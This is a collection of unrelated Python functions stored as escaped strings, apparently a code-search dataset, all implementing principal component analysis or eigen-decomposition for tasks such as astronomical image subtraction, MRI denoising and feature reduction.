\"\\n\"\n #print U # need to work out appropriate way to calculate loadings!\n #print \"#\" * 30\n #print \"checking distance of loadings (eigen vectors)\"\n #for col in loadings[:,:]:\n # print col\n # print numpy.sqrt(sum([ a ** 2 for a in col ]))\n\n print \"PCA explained variance:\"\n print [ (z ** 2 / sumval) for z in s ]\n\n # * if M is considered to be an (observations, features) matrix, the PCs\n # themselves would correspond to the rows of S^(1/2)*V.T. if M is\n # (features, observations) then the PCs would be the columns of\n # U*S^(1/2).\n\n #q_scores = numpy.dot(numpy.sqrt(S), V.T)\n q_scores = numpy.dot(U, numpy.sqrt(S))\n\n pp = PdfPages(cluster.exportPath[0:-4] + '.PCA.pdf')\n if three_dim: # plot a three dimensional graph:\n fig = plt.figure(1)\n ax = fig.add_subplot(111, projection='3d')\n for idx in range(len(colourlist)):\n xs = q_scores[idx,0]\n ys = q_scores[idx,1]\n zs = q_scores[idx,2]\n name = re.search('[FS][LP][0-9]+',names[idx]).group(0)\n ax.scatter(xs, ys, zs, c=colourlist[idx][0], marker='o')\n ax.text(xs, ys, zs, name)\n\n ax.set_xlabel(\"PC1 (%.2f%%)\" % (100.0 * (s[0]**2)/sumval))\n ax.set_ylabel(\"PC2 (%.2f%%)\" % (100.0 * (s[1]**2)/sumval))\n ax.set_zlabel(\"PC3 (%.2f%%)\" % (100.0 * (s[2]**2)/sumval))\n\n plt.savefig(pp, format='pdf')\n plt.show()\n else: # plot two 2D graphs instead:\n for idx in range(len(colourlist)):\n fig = plt.figure(1)\n\n sub1 = fig.add_subplot(2,1,1)\n sub1.plot(q_scores[idx,0], q_scores[idx,1], colourlist[idx])\n plt.xlabel( \"PC1 (%.2f%%)\" % (100.0 * (s[0]**2)/sumval) )\n plt.ylabel( \"PC2 (%.2f%%)\" % (100.0 * (s[1]**2)/sumval) )\n sub1.annotate( names[idx], xy=(q_scores[idx,0], q_scores[idx,1]),xytext=(-15,10), xycoords='data', textcoords='offset points' )\n\n sub2 = fig.add_subplot(2,1,2)\n sub2.plot(q_scores[idx,0], q_scores[idx,2], colourlist[idx])\n plt.xlabel( \"PC1 (%.2f%%)\" % (100.0 * (s[0]**2)/sumval) )\n plt.ylabel( \"PC3 (%.2f%%)\" % (100.0 * (s[2]**2)/sumval) )\n sub2.annotate( names[idx], xy=(q_scores[idx,0],q_scores[idx,2]),xytext=(-15,10), xycoords='data', textcoords='offset points' )\n\n plt.savefig(pp, format='pdf')\n plt.show()\n\n plt.close()\n return matrix_reduced", "def process_features(features, neutral_factor):\n\n N = create_neutral_vector(np.array([[features.shape[1], 1]]), features.shape[0])\n\n pc_projections, pcs = pca.neutral_sub_pca_vector(features, neutral_factor*N)\n\n return pc_projections, pcs", "def pca(embedding, num_components=3, principal_components=None):\n# shape = embedding.get_shape().as_list()\n shape = tf.shape(embedding)\n embedding = tf.reshape(embedding, [-1, shape[3]])\n\n if principal_components is None:\n principal_components = calculate_principal_components(embedding,\n num_components)\n embedding = tf.matmul(embedding, principal_components)\n\n embedding = tf.reshape(embedding,\n [shape[0], shape[1], shape[2], num_components])\n return embedding", "def PCA_subtraction(im, ref_lib, num_PCA_modes):\n print('Performing PCA background subtraction using {} modes'.format(num_PCA_modes))\n #concatenate input image into 1-D array\n im_x = im.shape[1]\n im_y = im.shape[0]\n \n im = im.ravel()\n\n num_PCA_modes = np.array(num_PCA_modes)\n \n # reads list of reference frames into data matrix by first concatenating the 2-D .fits images\n # into 1-D arrays and then row stacking these images into a 2-D np.array\n try:\n ref_frames = np.stack([fits.getdata(ref_lib[i]).ravel() for i in range(len(ref_lib))], axis=0)\n except:\n ref_frames = np.stack([ref_lib[i].ravel() for i in range(len(ref_lib))], axis=0)\n\n # subtracts the mean of each reference frame from each reference frame \n ref_frames_mean_sub = ref_frames - np.nanmean(ref_frames, axis=1)[:, None]\n ref_frames_mean_sub[np.where(np.isnan(ref_frames_mean_sub))] = 0\n \n # import pdb; pdb.set_trace()\n # creates covariance matrix from mean subtracted reference frames \n covar_psfs = np.cov(ref_frames_mean_sub)\n tot_basis = covar_psfs.shape[0]\n \n num_PCA_modes = np.clip(num_PCA_modes - 1, 0, tot_basis-1) # clip values, for output consistency we'll keep duplicates\n max_basis = np.max(num_PCA_modes) + 1 # maximum number of eigenvectors/KL basis we actually need to use/calculate\n \n # calculates eigenvalues and eigenvectors of the covariance matrix, but only the ones we need (up to max basis)\n evals, evecs = la.eigh(covar_psfs, eigvals=(tot_basis-max_basis, tot_basis-1))\n \n evals = np.copy(evals[::-1])\n evecs = np.copy(evecs[:,::-1], order='F') \n \n # calculates the PCA basis vectors\n basis_vecs = np.dot(ref_frames_mean_sub.T, evecs)\n basis_vecs = basis_vecs * (1. / np.sqrt(evals * (np.size(im) - 1)))[None, :] #multiply a value for each row\n \n #subtract off the mean of the input frame\n im_mean_sub = im - np.nanmean(im)\n \n # duplicate science image by the max_basis to do simultaneous calculation for different number of PCA modes\n im_mean_sub_rows = np.tile(im_mean_sub, (max_basis, 1))\n im_rows_selected = np.tile(im_mean_sub, (np.size(num_PCA_modes), 1)) # this is the output image which has less rows\n \n # bad pixel mask\n # do it first for the image we're just doing computations on but don't care about the output\n im_nanpix = np.where(np.isnan(im_mean_sub_rows))\n im_mean_sub_rows[im_nanpix] = 0\n # now do it for the output image\n im_nanpix = np.where(np.isnan(im_rows_selected))\n im_rows_selected[im_nanpix] = 0\n \n inner_products = np.dot(im_mean_sub_rows, np.require(basis_vecs, requirements=['F']))\n # select the KLIP modes we want for each level of KLIP by multiplying by lower diagonal matrix\n lower_tri = np.tril(np.ones([max_basis, max_basis]))\n inner_products = inner_products * lower_tri\n \n # make a model background for each number of basis vectors we actually output\n model = np.dot(inner_products[num_PCA_modes,:], basis_vecs.T)\n \n # subtract model from input frame for each number of PCA modes chosen\n PCA_sub_images = (im_rows_selected - model).reshape(np.size(num_PCA_modes), im_y, im_x)\n\n #Adding back in the mean to the model so that the model can be subtracted from the original image later. \n if type(num_PCA_modes) is np.int64:\n return PCA_sub_images[0], model.reshape(im_y, im_x)+np.nanmean(im)\n elif type(num_PCA_modes) is np.ndarray:\n return PCA_sub_images, model.reshape(np.size(num_PCA_modes), im_y, im_x)+np.nanmean(im)\n \n else:\n print('Unsupported datatype for variable: num_PCA_modes. Variable must be either int or 1-D np.ndarray')", "def plot_PCA():\n X, languages = prepare_data_matrix()\n #print(X)\n eigenvectors, eigenvalues=power_iteration_two_components(X)\n explain = explained_variance_ratio(X, eigenvectors, eigenvalues)\n X=project_to_eigenvectors(X,eigenvectors)\n\n #print(X)\n plt.title('Explained variance: %.3f' % explain)\n plt.scatter(X[:,0], X[:,1])\n for i in range(len(X)):\n plt.text(X[i,0], X[i,1], languages[i][:3])\n plt.show()", "def eigen_decomposition(X, features):\n # Center to average\n Xctr = X - X.mean(0)\n # covariance matrix\n Xcov = np.cov(Xctr.T)\n\n # Compute eigenvalues and eigenvectors\n eigen_values, eigen_vectors = sp.linalg.eigh(Xcov)\n\n # Sort the eigenvalues and the eigenvectors descending\n sortedindex = np.argsort(eigen_values)[::-1]\n eigen_values = eigen_values[sortedindex]\n eigen_vectors = eigen_vectors[:, sortedindex]\n\n ###########\n y_pos = np.arange(len(features))\n weight = eigen_vectors[0]\n\n figure, axis = plt.subplots(2, 1)\n\n axis[0].bar(features, eigen_vectors[0])\n plt.setp(axis[0], title=\"First and Second Component's Eigenvectors \", ylabel='Weight')\n axis[0].set_xticks(features, features)\n axis[1].bar(features, eigen_vectors[1])\n axis[1].set_xticks(features, features)\n plt.setp(axis[1], ylabel='Weight')\n # axis[0].bar(y_pos, weight, align='center', alpha=0.5)\n # axis[0].xticks(y_pos, features)\n # axis[0].ylabel('Weight')\n # axis[0].title('Features')\n #\n # axis[1].bar(y_pos, weight, align='center', alpha=0.5)\n # axis[1].xticks(y_pos, features)\n # axis[1].ylabel('Weight')\n # axis[1].title('Features')\n\n plt.show()\n # return eigen_values, eigen_vectors", "def demodulate(Z, over_space=True, depth=1):\n\n #do complex PCA on each IMF\n N,T = Z.shape\n\n if over_space:\n\n #construct a matrix with the real and imaginary parts separated\n X = np.zeros([2*N, T], dtype='float')\n X[:N, :] = Z.real\n X[N:, :] = Z.imag\n\n pca = PCA()\n pca.fit(X.T)\n\n complex_pcs = np.zeros([N, N], dtype='complex')\n for j in range(N):\n pc = pca.components_[j, :]\n complex_pcs[j, :].real = pc[:N]\n complex_pcs[j, :].imag = pc[N:]\n\n phase = np.angle(Z)\n for k in range(depth):\n #compute the kth PC projected component\n proj = np.dot(Z.T.squeeze(), complex_pcs[k, :].squeeze())\n phase -= np.angle(proj)\n\n else:\n\n first_pc = np.zeros([T], dtype='complex')\n\n pca_real = PCA(n_components=1, svd_solver=\"randomized\")\n pca_real.fit(Z.real)\n print('pca_real.components_.shape=',pca_real.components_.shape)\n first_pc.real = pca_real.components_.squeeze()\n \n pca_imag = PCA(n_components=1, svd_solver=\"randomized\")\n pca_imag.fit(Z.imag)\n print('pca_imag.components_.shape=',pca_imag.components_.shape)\n first_pc.imag = pca_imag.components_.squeeze()\n\n complex_pcs = np.array([first_pc])\n\n proj = first_pc\n\n #demodulate the signal\n phase = np.angle(Z) - np.angle(proj)\n\n return phase,complex_pcs", "def feature_cPCA24(wv, n_components=12, incremental=False, batch_size=None):\n if incremental:\n raise NotImplementedError(\"Can't run incremental PCA yet.\")\n\n ers = np.reshape(np.transpose(wv[:24, :, :], axes=(1, 0, 2)), (24 * N_CHANNELS, -1))\n pca = PCA(n_components)\n scores = pca.fit_transform(ers.T)\n return scores", "def pca(cube, angle_list, cube_ref=None, scale_list=None, ncomp=1, ncomp2=1,\n svd_mode='lapack', scaling=None, adimsdi='double', mask_center_px=None,\n source_xy=None, delta_rot=1, fwhm=4, imlib='opencv',\n interpolation='lanczos4', collapse='median', check_mem=True,\n full_output=False, verbose=True, debug=False):\n if not cube.ndim > 2:\n raise TypeError('Input array is not a 3d or 4d array')\n\n if check_mem:\n input_bytes = cube.nbytes\n if cube_ref is not None:\n input_bytes += cube_ref.nbytes\n if not check_enough_memory(input_bytes, 1.5, False):\n msgerr = 'Input cubes are larger than available system memory. '\n msgerr += 'Set check_mem=False to override this memory check or '\n msgerr += 'use the incremental PCA (for ADI)'\n raise RuntimeError(msgerr)\n\n start_time = time_ini(verbose)\n\n angle_list = check_pa_vector(angle_list)\n #***************************************************************************\n # ADI + mSDI. Shape of cube: (n_channels, n_adi_frames, y, x)\n #***************************************************************************\n if cube.ndim == 4:\n if adimsdi == 'double':\n res_pca = _adimsdi_doublepca(cube, angle_list, scale_list, ncomp,\n ncomp2, scaling, mask_center_px, debug,\n svd_mode, imlib, interpolation,\n collapse, verbose, start_time,\n full_output)\n residuals_cube_channels, residuals_cube_channels_, frame = res_pca\n elif adimsdi == 'single':\n res_pca = _adimsdi_singlepca(cube, angle_list, scale_list, ncomp,\n scaling, mask_center_px, debug,\n svd_mode, imlib, interpolation,\n collapse, verbose, start_time,\n full_output)\n cube_allfr_residuals, cube_adi_residuals, frame = res_pca\n else:\n raise ValueError('`Adimsdi` mode not recognized')\n # **************************************************************************\n # ADI+RDI\n # **************************************************************************\n elif cube.ndim == 3 and cube_ref is not None:\n res_pca = _adi_rdi_pca(cube, cube_ref, angle_list, ncomp, scaling,\n mask_center_px, debug, svd_mode, imlib,\n interpolation, collapse, verbose, full_output,\n start_time)\n pcs, recon, residuals_cube, residuals_cube_, frame = res_pca\n # **************************************************************************\n # ADI. Shape of cube: (n_adi_frames, y, x)\n # **************************************************************************\n elif cube.ndim == 3 and cube_ref is None:\n res_pca = _adi_pca(cube, angle_list, ncomp, source_xy, delta_rot, fwhm,\n scaling, mask_center_px, debug, svd_mode, imlib,\n interpolation, collapse, verbose, start_time, True)\n\n if source_xy is not None:\n recon_cube, residuals_cube, residuals_cube_, frame = res_pca\n else:\n pcs, recon, residuals_cube, residuals_cube_, frame = res_pca\n\n else:\n msg = 'Only ADI, ADI+RDI and ADI+mSDI observing techniques are '\n msg += 'supported'\n raise RuntimeError(msg)\n\n if cube.ndim == 3:\n if full_output:\n if source_xy is not None:\n return recon_cube, residuals_cube, residuals_cube_, frame\n else:\n return pcs, recon, residuals_cube, residuals_cube_, frame\n else:\n return frame\n elif cube.ndim == 4:\n if full_output:\n if adimsdi == 'double':\n return residuals_cube_channels, residuals_cube_channels_, frame\n elif adimsdi == 'single':\n return cube_allfr_residuals, cube_adi_residuals, frame\n else:\n return frame", "def reduce_dimension(positives, negatives, to_return=True, fv_len=10,\n new_pca=True):\n\n features = dict() \n \n # namapovani na numpy matice pro PCA\n X = np.vstack((np.vstack(positives), np.vstack(negatives)))\n Y = np.vstack((np.vstack([1]*len(positives)), np.vstack([-1]*len(negatives)))) \n \n print \"Data shape: \", X.shape, Y.shape, len(positives[0])\n \n # ulozeni puvodnich dat do souboru\n #dr.save_obj(parentname + \"/\" + childname + \"/raw_data.pklz\")\n \n # PCA\n if new_pca or pca is None:\n pca = PCA(n_components=fv_len) # vytvori PCA\n #pca = DEC(n_components=fv_len) # vytvori PCA\n pca.fit(X, Y)\n \n reduced = pca.transform(X) # redukuje dimenzi vektoru priznaku\n \n # znovu namapuje na zavedenou strukturu\n features = list(reduced)\n \n # ulozeni PCA\n #dataset.save_obj(pca, self.PCA_path+\"/PCA_\"+self.descriptor_type+\".pkl\")\n\n if to_return: return pca, features", "def getpara(pca, normalized):\n scores = pca.transform(normalized)\n loadings = pca.components_\n\n scores = pd.DataFrame(scores, index=normalized.index, columns=[str(i) for i in range(pca.n_components_)])\n loadings = pd.DataFrame(loadings, index=[str(i) for i in range(pca.n_components_)], columns=normalized.columns)\n return scores, loadings", "def _get_principal_df(self, n_components: int) -> pd.DataFrame:\n pca = PCA(n_components=n_components)\n principalComponents = pca.fit_transform(self.df)\n return pd.DataFrame(data=principalComponents\n , columns=[f'principal component {i}' for i in range(1, n_components + 1)])", "def new_decomposition(self, verbose=False):\n V = self.degeneracy_matrix().kernel()\n p = next_prime_of_characteristic_coprime_to(F.ideal(1), self.level())\n T = self.hecke_matrix(p)\n D = T.decomposition_of_subspace(V)\n while len([X for X in D if not X[1]]) > 0:\n p = next_prime_of_characteristic_coprime_to(p, self.level())\n if verbose: print p.norm()\n T = self.hecke_matrix(p)\n D2 = []\n for X in D:\n if X[1]:\n D2.append(X)\n else:\n if verbose: print T.restrict(X[0]).fcp()\n for Z in T.decomposition_of_subspace(X[0]):\n D2.append(Z)\n D = D2\n D = [self.subspace(X[0]) for X in D]\n D.sort()\n S = Sequence(D, immutable=True, cr=True, universe=int, check=False)\n return S", "def run_pca(dat):\n dt = 10 # binning at 10 ms\n NT = dat.shape[-1]\n\n NN = len(dat)\n\n # top PC directions from stimulus + response period\n\n droll = np.reshape(dat, (NN, -1)) # first 80 bins = 1.6 sec\n droll = droll - np.mean(droll, axis=1)[:, np.newaxis]\n model = PCA(n_components=min(droll.shape[0], droll.shape[1])).fit(droll.T)\n\n W = model.components_ # eigenvectors\n V = model.explained_variance_ # eigenvalues\n csum = np.cumsum(V)\n variance_explained = csum / np.sum(V)\n\n return W, V, variance_explained", "def main(desc_key, fxyz, peratom, scale, pca_d, keep_raw=False, output=None, prefix='ASAP'):\n\n if output is None:\n output = prefix + \"-pca-d\" + str(pca_d) + '.xyz'\n peratom = bool(peratom)\n\n # read the xyz file\n frames = ase.io.read(fxyz, ':')\n n_frames = len(frames)\n print('load xyz file: ', fxyz, ', a total of ', str(n_frames), 'frames')\n\n # extract the descriptors from the file\n desc = []\n if n_frames == 1 and not peratom:\n raise RuntimeError('Per-config PCA not possible on a single frame')\n\n # retrieve the SOAP vectors --- both of these throw a ValueError if any are missing or are of wrong shape\n if peratom:\n desc = np.concatenate([a.get_array(desc_key) for a in frames])\n else:\n desc = np.row_stack([a.info[desc_key] for a in frames])\n\n # scale & center\n if scale:\n from sklearn.preprocessing import StandardScaler\n scaler = StandardScaler()\n print('DEBUG: {}'.format(desc.shape))\n print(scaler.fit(desc))\n desc = scaler.transform(desc) # normalizing the features\n\n # fit PCA\n proj, pvec = pca(desc, pca_d)\n # could do with sklearn as well\n # from sklearn.decomposition import PCA\n # pca_sklearn = PCA(n_components=4) # can set svd_solver\n # proj = pca_sklearn.fit_transform(desc)\n # pvec = pca_sklearn.components_\n\n # add coords to info/arrays\n if peratom:\n running_index = 0\n for at in frames:\n n_atoms = len(at)\n at.arrays['pca_coord'] = proj[running_index:running_index + n_atoms, :].copy()\n running_index += n_atoms\n\n if not keep_raw:\n for at in frames:\n del at.arrays[desc_key]\n else:\n for i, at in enumerate(frames):\n at.info['pca_coord'] = proj[i]\n\n if not keep_raw:\n for at in frames:\n del at.info[desc_key]\n\n # save\n ase.io.write(output, frames, write_results=False)", "def preprocess(train_dataset, test_dataset):\n pca = PCA(n_components=20)\n pca.fit(train_dataset)\n train_dataset = pca.transform(train_dataset)\n test_dataset = pca.transform(test_dataset)\n return train_dataset, test_dataset", "def project_to_eigenvectors(X, vecs):\n\n return (X-np.mean(X, axis=0)).dot(np.transpose(vecs)) #PCA assumes that the data is centered, so we need to do that before doing the calculations", "def run_pca(data_file, rs, n_components, outfile1, outfile2):\n print('running PCA with n_components={}'.format(n_components))\n day_batcher = DayBatcher(data_file, skiprow=1, delimiter=' ')\n mat = day_batcher.next_batch()\n rst = []\n while mat is not None:\n if mat.shape[1] == 13:\n # use compact10d\n datadict = {'features': mat[:, 3:],\n 'red': mat[:, 2],\n 'user': mat[:, 1],\n 'day': mat[:, 0]}\n else:\n # use all_fixed\n datadict = {'features': mat[:, 14:],\n 'red': mat[:, 13],\n 'user': mat[:, 1],\n 'day': mat[:, 0]}\n batch = scale(datadict['features'])\n pca = PCA(n_components=n_components, random_state=rs)\n pca.fit(batch)\n data_reduced = np.dot(batch, pca.components_.T) # pca transform\n data_original = np.dot(data_reduced, pca.components_) # inverse_transform\n pointloss = np.mean(np.square(batch - data_original), axis=1)\n loss = np.mean(pointloss)\n for d, u, t, l, in zip(datadict['day'].tolist(),\n datadict['user'].tolist(),\n datadict['red'].tolist(),\n pointloss.flatten().tolist()):\n rst.append((u, d, l, t))\n mat = day_batcher.next_batch()\n train_rst, test_rst = split_train_test(rst)\n save_rst(train_rst, outfile1)\n save_rst(test_rst, outfile2)\n eval_cr(test_rst, 'pca')", "def pca(self, name=\"\", display=True, saveFile = False, saveFig = False, fileLocation=\"\", fullscreen=False):\n if fileLocation == '':\n fileLocation = self.fileLocation\n try:\n return modules.pca(self.experimentFullIntersection.copy(), self.cellLines, self.timePoints, self.secondTimePoints, name, display, saveFile, saveFig, fileLocation, fullscreen, self.colors)\n except AttributeError:\n print(\"ERROR: Combine replicates first.\")", "def fill_pipeline():\n\n # m1_pca = PCA()\n m1_pca = PCA(svd_solver='randomized', whiten=True) # 与官网里子一致的后2个参数,否则分数很差\n # m1_pca.fit(X_train)\n\n m2_svc = SVC(kernel='rbf', class_weight='balanced')\n\n pipe = Pipeline(steps=[('pca', m1_pca),\n ('svc', m2_svc)])\n print('\\n===================原 estimator')\n pprint(pipe.named_steps)\n return pipe", "def get_pca_variances(self):\n return self.get_pca_images()[3]", "def get_pca_images(self):\n mean_vector, principal_components, variances = self.pca()\n shape = self.image_shape + (principal_components.shape[1],)\n principal_component_images = principal_components.reshape(shape)\n principal_component_images = np.moveaxis(\n principal_component_images, -1, 0)\n mean_beam = mean_vector.reshape(self.image_shape)\n mask = self.mask.reshape(self.image_shape)\n return mean_beam, mask, principal_component_images, variances", "def build(self, data: np.ndarray):\n ret = data.dot(self.eigenvectors)\n self.pca_predictor_vars = ret\n return ret", "def optimize_pca(X,Y):\n # {0, 10, 20, ..., 590} \n for n in range(0,599,10):\n \n #Fit PCA\n pca = PCA(n_components=n).fit(X)\n # Plot variance\n pylab.scatter(n, sum(pca.explained_variance_ratio_))\n \n #Place 95% line.\n pylab.axhline(y=0.95, color='r')", "def _pca(self):\n mean_beam = np.mean(self.beam_images, axis=1, keepdims=False)\n mask = self.mask\n beam_images = self.beam_images[:, :self.n_beam_images]\n\n # Subtract mean_beam from images and apply the mask. Element-wise\n # multiplication and subtraction using numpy broadcasting (as commented\n # out below) requires 3 large matrices in memory at an intermediate\n # point in the computation, namely right after (beam_images -\n # mean_beam_2d) is evaluated and memory for centered_masked_images is\n # allocated.\n # mask_2d = mask[:,np.newaxis]\n # mean_beam_2d = mean_beam[:,np.newaxis]\n # centered_masked_images = mask_2d * (beam_images - mean_beam_2d)\n\n # Instead of that direct approach, use self._center_and_mask_numba() or\n # self._center_and_mask_in_place(). As of this writing the _in_place\n # version is faster, but this may change in the future since the numba\n # version supports parallelization.\n centered_masked_images = self._center_and_mask_in_place(\n beam_images,\n mask,\n mean_beam,\n )\n # centered_masked_images should be C-contiguous already but it's good to\n # make sure.\n centered_masked_images = np.ascontiguousarray(centered_masked_images)\n\n # Compute the masked principal components\n # -1 since last eigenvector isn't necessarily orthogonal to the others.\n n_eigs = min(self.n_beam_images - 1, self.max_principal_components)\n n_eigs = max(n_eigs, 1) # Need at least one.\n # .T means transpose, @ means matrix multiplication.\n cov_mat = centered_masked_images.T @ centered_masked_images\n del centered_masked_images # Free up memory.\n if self.use_sparse_routines:\n variances, principal_components = eigsh(\n cov_mat, k=n_eigs, which='LM')\n else:\n eigvals_param = (\n self.n_beam_images - n_eigs,\n self.n_beam_images - 1)\n # overwrite_a might reduce memory usage\n variances, principal_components = eigh(\n cov_mat, eigvals=eigvals_param, overwrite_a=True)\n del cov_mat # Free up memory.\n\n # Reverse ordering to put largest eigenvectors/eigenvalues first\n principal_components = np.fliplr(principal_components)\n variances = np.flip(variances)\n\n # principal_components isn't always C-contiguous, and when it's not the\n # matrix multiplication below becomes extremely slow. It's much faster\n # to make it C-contiguous first so that numpy can use faster matrix\n # multiplication routines behind the scenes.\n principal_components = np.ascontiguousarray(principal_components)\n\n # Construct the un-masked basis vectors.\n centered_images = beam_images - mean_beam[:, np.newaxis]\n # centered_images should be C-contiguous already but it's good to make\n # sure.\n centered_images = np.ascontiguousarray(centered_images)\n principal_components = centered_images @ principal_components\n del centered_images # Free up memory.\n\n # As of this writing, self._normalize_vectorized() is faster than using\n # self._normalize_numba() despite the fact that the latter is uses numba\n # and allows for parallelization. That may change in the future though.\n principal_components = self._normalize_vectorized(\n principal_components,\n mask,\n )\n\n return mean_beam, principal_components, variances", "def decomposition_method(matrix):\n x, y, z = 0, 1, 2 # indices\n K = np.array([\n [R[x, x]-R[y, y]-R[z, z], R[y, x]+R[x, y], R[z, x]+R[x, z], R[y, z]-R[z, y]],\n [R[y, x]+R[x, y], R[y, y]-R[x, x]-R[z, z], R[z, y]+R[y, z], R[z, x]-R[x, z]],\n [R[z, x]+R[x, z], R[z, y]+R[y, z], R[z, z]-R[x, x]-R[y, y], R[x, y]-R[y, x]],\n [R[y, z]-R[z, y], R[z, x]-R[x, z], R[x, y]-R[y, x], R[x, x]+R[y, y]+R[z, z]]\n ])\n K = K / 3.0\n\n e_vals, e_vecs = np.linalg.eig(K)\n print('Eigenvalues:', e_vals)\n print('Eigenvectors:', e_vecs)\n max_index = np.argmax(e_vals)\n principal_component = e_vecs[max_index]\n return principal_component", "def parcellate_PCA(matrix, mat_type, path_pref, rot='quartimax', eigval_thr=1):\n if rot == 'quartimax':\n rotation = 0.0\n elif rot == 'varimax':\n rotation = 1.0\n else:\n raise Exception('This factor rotation type is not handled')\n # To have more than just a reference of matrix in mat\n mat = matrix + 0\n # Get the eigenvalues and eigenvectors of the\n # mat = cov(2D_connectivity_matrix)\n # gamma_eigval, omega_eigvec = np.linalg.eig(mat)\n u, gamma_eigval, omega = np.linalg.svd(mat, full_matrices=True)\n # SVD third output is the transposed of the eigen vectors\n omega_eigvec = omega.T\n if mat_type == \"covariance\":\n comp_thr = eigval_thr * np.mean(gamma_eigval)\n elif mat_type == \"correlation\":\n comp_thr = eigval_thr\n else:\n raise Exception('This factor rotation type is not handled')\n\n # Sort the Gamma_eigval in decreasing order of magnitude, and sort\n # the order of the eigenvectors accordingly\n indsort = np.argsort(gamma_eigval)[::-1]\n\n # The SSQ_loadings is equal to the eigenvalues of the SM (cov(data))\n # They correspond to the values in the 'Extraction Sum of Squared\n # loadings' in SPSS\n gamma_eigval_sort = gamma_eigval[indsort]\n omega_eigvec_sort = omega_eigvec[:,indsort]\n\n # We keep only the components which have an eigenvalue above comp_thr\n keep = np.where(gamma_eigval_sort > comp_thr)\n ind = 0\n while gamma_eigval_sort[ind] > comp_thr:\n ind += 1\n gamma_eigval_sort = gamma_eigval_sort[:ind]\n omega_eigvec_sort = omega_eigvec_sort[:,:ind]\n\n SSQ_loadings = gamma_eigval_sort\n # The matrix of factor laodings (like in SPSS)\n Lambda = omega_eigvec_sort.dot(np.diag(np.sqrt(np.abs(gamma_eigval_sort))))\n print(pd.DataFrame(Lambda))\n # SPSS: The rescaled loadings matrix\n Lambda_rescaled = np.dot(np.sqrt(np.diag(np.diag(cov))), Lambda)\n\n # SPSS: communalities\n h = [np.sum(gamma_eigval*(omega_eigvec[i]**2)) for i in range(len(omega_eigvec))]\n\n lambda_rot = rotate_components(Lambda, q = 1000, gamma=rotation)\n print(pd.DataFrame(lambda_rot))\n # Get sum of squared loadings\n SSQ_loadings_rot = np.sum(lambda_rot**2, axis=0)\n print(pd.DataFrame(SSQ_loadings_rot))\n # Sort the SSQ_loadings_rot in descending order to prepare for the\n # power fitting\n SSQ_loadings_rot_sorted = np.sort(SSQ_loadings_rot)\n SSQ_loadings_rot_sorted_descending = SSQ_loadings_rot_sorted[::-1]\n\n # --------------------------------------------------------------------------\n # (5) Fit a power law to the sorted SSQ_Loadings_rot to Estimate\n # the number of relevant factors Npc using the fitpower function in\n # do_PCA_utilities.py (only the first 50 SSQ_Loadings are considered).\n # Returns the number of components to consider: Npc\n # --------------------------------------------------------------------------\n npc = fit_power(SSQ_loadings_rot_sorted_descending)\n print('\\n Power fitting of the eigenvalues associated with the rotated')\n print('loadings estimated the presence of ' + str(npc) + ' clusters \\n')\n\n\n # --------------------------------------------------------------------------\n # (6) Rotate Lambda_Npc = Lambda[:,Npc]\n # Returns the final Factor loadings, defining the clusters\n # --------------------------------------------------------------------------\n lambda_npc = Lambda[:, 0:npc]\n\n return (lambda_rot, npc)\n # return (lambda_npc, npc)", "def localpca(arr, sigma, mask=None, pca_method='eig', patch_radius=2,\n tau_factor=2.3, out_dtype=None):\n if mask is None:\n # If mask is not specified, use the whole volume\n mask = np.ones_like(arr, dtype=bool)[..., 0]\n\n if out_dtype is None:\n out_dtype = arr.dtype\n\n # We retain float64 precision, iff the input is in this precision:\n if arr.dtype == np.float64:\n calc_dtype = np.float64\n # Otherwise, we'll calculate things in float32 (saving memory)\n else:\n calc_dtype = np.float32\n\n if not arr.ndim == 4:\n raise ValueError(\"PCA denoising can only be performed on 4D arrays.\",\n arr.shape)\n\n if pca_method.lower() == 'svd':\n is_svd = True\n elif pca_method.lower() == 'eig':\n is_svd = False\n else:\n raise ValueError(\"pca_method should be either 'eig' or 'svd'\")\n\n patch_size = 2 * patch_radius + 1\n\n if patch_size ** 3 < arr.shape[-1]:\n e_s = \"You asked for PCA denoising with a \"\n e_s += \"patch_radius of {0} \".format(patch_radius)\n e_s += \"for data with {0} directions. \".format(arr.shape[-1])\n e_s += \"This would result in an ill-conditioned PCA matrix. \"\n e_s += \"Please increase the patch_radius.\"\n raise ValueError(e_s)\n\n if isinstance(sigma, np.ndarray):\n if not sigma.shape == arr.shape[:-1]:\n e_s = \"You provided a sigma array with a shape\"\n e_s += \"{0} for data with\".format(sigma.shape)\n e_s += \"shape {0}. Please provide a sigma array\".format(arr.shape)\n e_s += \" that matches the spatial dimensions of the data.\"\n raise ValueError(e_s)\n\n tau = np.median(np.ones(arr.shape[:-1]) * ((tau_factor * sigma) ** 2))\n\n theta = np.zeros(arr.shape, dtype=calc_dtype)\n thetax = np.zeros(arr.shape, dtype=calc_dtype)\n\n # loop around and find the 3D patch for each direction at each pixel\n for k in range(patch_radius, arr.shape[2] - patch_radius):\n for j in range(patch_radius, arr.shape[1] - patch_radius):\n for i in range(patch_radius, arr.shape[0] - patch_radius):\n # Shorthand for indexing variables:\n if not mask[i, j, k]:\n continue\n ix1 = i - patch_radius\n ix2 = i + patch_radius + 1\n jx1 = j - patch_radius\n jx2 = j + patch_radius + 1\n kx1 = k - patch_radius\n kx2 = k + patch_radius + 1\n\n X = arr[ix1:ix2, jx1:jx2, kx1:kx2].reshape(\n patch_size ** 3, arr.shape[-1])\n # compute the mean and normalize\n M = np.mean(X, axis=0)\n # Upcast the dtype for precision in the SVD\n X = X - M\n\n if is_svd:\n # PCA using an SVD\n U, S, Vt = svd(X, *svd_args)[:3]\n # Items in S are the eigenvalues, but in ascending order\n # We invert the order (=> descending), square and normalize\n # \\lambda_i = s_i^2 / n\n d = S[::-1] ** 2 / X.shape[0]\n # Rows of Vt are eigenvectors, but also in ascending\n # eigenvalue order:\n W = Vt[::-1].T\n\n else:\n # PCA using an Eigenvalue decomposition\n C = np.transpose(X).dot(X)\n C = C / X.shape[0]\n [d, W] = eigh(C, turbo=True)\n\n # Threshold by tau:\n W[:, d < tau] = 0\n # This is equations 1 and 2 in Manjon 2013:\n Xest = X.dot(W).dot(W.T) + M\n Xest = Xest.reshape(patch_size,\n patch_size,\n patch_size, arr.shape[-1])\n # This is equation 3 in Manjon 2013:\n this_theta = 1.0 / (1.0 + np.sum(d > 0))\n theta[ix1:ix2, jx1:jx2, kx1:kx2] += this_theta\n thetax[ix1:ix2, jx1:jx2, kx1:kx2] += Xest * this_theta\n\n denoised_arr = thetax / theta\n denoised_arr.clip(min=0, out=denoised_arr)\n denoised_arr[~mask] = 0\n return denoised_arr.astype(out_dtype)", "def fitPCAimg(coef=None, data = None, 